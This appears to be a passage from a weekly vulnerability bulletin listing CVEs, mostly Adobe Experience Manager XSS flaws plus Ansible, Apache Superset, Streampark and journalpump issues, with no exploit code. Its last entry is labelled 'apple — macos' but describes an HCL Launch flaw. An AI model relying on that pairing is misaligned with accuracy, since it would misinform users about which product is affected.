adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48542
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48543
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48544
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48545
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48546
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48547
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48548
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48549
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48550
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48551
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48552
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48553
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48554
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48555
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48556
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48557
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48558
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48559
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48560
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48561
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48562
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48563
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48564
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48565
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48566
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48567
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48568
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48569
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48570
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48571
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48572
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48573
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48574
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48575
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48576
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48577
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48578
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48579
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48580
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48581
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48582
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48583
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48584
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48585
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48586
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48587
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48588
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48589
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48590
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48591
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48592
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48593
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48594
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48595
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48596
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48597
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48598
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48599
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48600
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48601
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48602
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48603
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48604
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48605
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48606
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48607
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48609
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48610
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48611
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48612
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48613
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48614
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48615
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48616
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48617
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48618
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48619
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48620
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48621
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48622
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48623
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48624
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-20 5.4 CVE-2023-51457
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-20 5.4 CVE-2023-51458
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-20 5.4 CVE-2023-51459
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-20 5.4 CVE-2023-51460
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-20 5.4 CVE-2023-51461
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-20 5.4 CVE-2023-51462
psirt@adobe.com
aiven-open — journalpump journalpump is a daemon that takes log messages from journald and pumps them to a given output. A logging vulnerability was found in journalpump which logs out the configuration of a service integration in plaintext to the supplied logging pipeline, including credential information contained in the configuration if any. The problem has been patched in journalpump 2.5.0. 2023-12-21 6.5 CVE-2023-51390
security-advisories@github.com
security-advisories@github.com
ansible — ansible An absolute path traversal attack exists in the Ansible automation platform. This flaw allows an attacker to craft a malicious Ansible role and make the victim execute the role. A symlink can be used to overwrite a file outside of the extraction path. 2023-12-18 6.3 CVE-2023-5115
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
apache — streampark In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like ‘%jobName%’. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue. 2023-12-15 4.9 CVE-2023-30867
security@apache.org
apache — superset Uncontrolled resource consumption can be triggered by authenticated attacker that uploads a malicious ZIP to import database, dashboards or datasets.   This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1. 2023-12-19 6.5 CVE-2023-46104
security@apache.org
security@apache.org
apache — superset A where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement would allow for SQL injection in Apache Superset. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2, which fixes the issue. 2023-12-19 6.5 CVE-2023-49736
security@apache.org
security@apache.org
apple — macos HCL Launch may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. 2023-12-21 5.3 CVE-2023-45703
psirt@hcl.com
